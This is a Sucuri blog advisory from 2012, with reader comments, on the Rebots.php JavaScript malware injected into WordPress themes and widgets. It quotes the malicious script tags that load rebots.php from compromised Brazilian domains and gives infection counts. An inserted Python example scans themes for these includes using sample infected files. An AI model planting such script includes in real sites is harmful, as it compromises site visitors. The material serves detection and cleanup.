Sucuri Blog

Website Security News

Rebots.php JavaScript Malware Being Actively Injected

August 24, 2012 by Dre Armeda

Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has been appearing more often, and the way it is included on infected sites has varied.

When you visit a compromised site, it will attempt to load an additional JavaScript file, like one of these:

<script src="http://lig-limp.com.br/rebots.php"..

<script; src="http://chezbruna.com.br/imagens/rebots.php"..

What’s It Do?

From what we’re seeing now, not much. The URLs included by the script call either return a 404 at this point, or load broken code leading to dead links. For example:

if(navigator.javaEnabled()) {
	document.write(' src="http://chezbruna.com.br//imagens/rebots.php?action=jv&h=1687634524"

The pages on a site where you may find it will vary, and so will the files that are actually infected. Here’s a quick SiteCheck screen:

[Screenshot: SiteCheck]

Note: Notice that SiteCheck shows the site as outdated. This website was running WordPress 3.2.1 at the time of the scan. This seems to be a common theme across the websites we’re seeing affected by Rebots.

Where to Find it

As mentioned, this will vary. Originally we were seeing the script called in theme templates. At first the script would appear above the HTML tags in the rendered source, and we were finding the offending code in header.php and/or index.php within the active WordPress theme.

Over the next few days, those instances were still happening, but we also started seeing the script called from functions.php and even stylesheets within the active theme.

Apparently this got old quickly; next we started seeing the script appear in text widgets within WordPress.

[Screenshot: Rebot in Widgets]
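To check the locations described above, the following added example (not code from the original post or from Sucuri) walks a theme directory and flags any `src=` reference to a `rebots.php` URL in templates, functions.php and stylesheets, and applies the same check to text-widget content exported from the database. The sample theme files and widget text are constructed for illustration; the function names are hypothetical.

```python
import re
import tempfile
from pathlib import Path

# src= attribute pointing at a rebots.php URL; also matches the malformed
# "<script;" form and the document.write() fragment quoted in the post.
REBOTS_RE = re.compile(
    r"""\bsrc\s*=\s*["']?(https?://[^"'\s>]+/rebots\.php[^"'\s>]*)""", re.I)
THEME_SUFFIXES = {".php", ".css"}  # templates, functions.php, stylesheets

def scan_text(text):
    """Return [(line_number, url)] for every rebots.php include in text."""
    return [(n, m.group(1))
            for n, line in enumerate(text.splitlines(), 1)
            for m in REBOTS_RE.finditer(line)]

def scan_theme(theme_dir):
    """Scan a theme directory; return {relative_path: [(line, url), ...]}."""
    root = Path(theme_dir)
    findings = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in THEME_SUFFIXES:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

# Constructed sample data (not taken from a real infected site).
SAMPLE_THEME = {
    "header.php": '<script src="http://lig-limp.com.br/rebots.php"></script>\n<html>\n',
    "functions.php": "<?php\n// theme setup\n?>\n"
                     '<script; src="http://chezbruna.com.br/imagens/rebots.php"></script>\n',
    "style.css": "body { margin: 0; }\n",
    "index.php": '<?php get_header(); ?>\n<script src="/js/site.js"></script>\n',
}
SAMPLE_WIDGET_TEXT = ('Welcome!\n<script src="http://hroil.com.br/old/rebots.php">'
                      "</script>")

def build_sample_theme(root):
    """Write SAMPLE_THEME into root so scan_theme() has files to walk."""
    for name, body in SAMPLE_THEME.items():
        Path(root, name).write_text(body, encoding="utf-8")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_theme(tmp)
        for rel, hits in scan_theme(tmp).items():
            print(rel, hits)
    print("widget", scan_text(SAMPLE_WIDGET_TEXT))
```

A hit in a theme file points to the template to clean; a hit in exported widget text means the injection lives in the database rather than on disk.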

Quick Info

We’re still researching numbers and hopefully it quits growing. So far, we have seen infections with these URLs:

http://hroil.com.br/old/rebots.php - 98 sites infected with it
http://lig-limp.com.br/rebots.php - 357 sites infected with it
http://chezbruna.com.br/imagens/rebots.php - 497 sites infected with it

That’s only the ones that we scanned directly. However, if you go on Google and search for “chezbruna.com.br/imagens/rebots.php” or “lig-limp.com.br/rebots.php” you’ll see quite a few more sites being affected.

What Do I do?

The first thing to check is that all the software on your server is updated. I’m talking applications, themes, plugins, and so on. If you don’t use it, get rid of it. Cross-Website Contamination happens all too often, so make sure to do some website garage cleaning ASAP.

The next thing to do is go scan your site with Sucuri SiteCheck. Seriously, it takes a second, it’s free, and it will let you know if you’ve been struck by Rebots.

If you have been hit and you need a hand clearing it, we can get you cleared and will cover you for the year. Check out the Sucuri service plans today.


Have you seen the Rebots JS Malware? What’s your experience? Have you seen variations, or other domains affected? Feel free to email Sucuri, or leave a comment below.

Categories: Security Advisory, Website Malware Infections, WordPress Security
Tags: Hacked Websites

About Dre Armeda

Dre Armeda was Sucuri’s founding CEO and Co-Founder who helped start up the company in 2010. Today, Dre is Sr. Director of Technical Program Management and serves as Head of Technical Program Management (TPM) for GoDaddy's Partners Business. As head of TPM, Dre leads the PMO and Program Delivery Teams, ultimately driving all the program management functions and supporting our partners. When Dre isn't executing strategic initiatives at GoDaddy, you can find him on the mat training in Jiu Jitsu as a Carlson Gracie brown belt. Connect with Dre on Twitter.

Reader Interactions

Comments

  1. Kailey ʇɹǝdɯɐl

    August 24, 2012

    Doesn’t seem related, but on the same site I cleaned up this Rebots hack yesterday I also found some unwanted gzipped files in /wp-content/plugins/ ( http://cl.ly/IzXC ). When downloaded, unzipped and looked at, they produced fake bank sign in pages ( http://cl.ly/IyFl and http://cl.ly/IyaL )

  2. n00bs@uc3

    August 24, 2012

    What’s it dropping?!

    • Andres Armeda

      August 24, 2012

      At this point just the JS to those sites. It looks like most of those sites have been disabled. We did test it using various user agents and such to see if we could get anything else out of it, nothing conclusive found.

  3. Brett Dalbeth

    August 28, 2012

    I got bit.. I needed an excuse to build a new website anyways.

  4. theGuruWithin

    August 29, 2012

    thank you for these updates. I find this arena fascinating. Do you ever have any career opportunities?

  5. sarabjeet singh

    September 26, 2012

    Great post indeed and thanks for all the information, it was very helpful. I really like that you are providing information on PHP and MYSQL with basic JAVASCRIPT. Being enrolled in http://www.wiziq.com/course/5871-php-mysql-with-basic-javascript-integrated-course I was looking for such information online to assist me on PHP and MySQL and your information helped
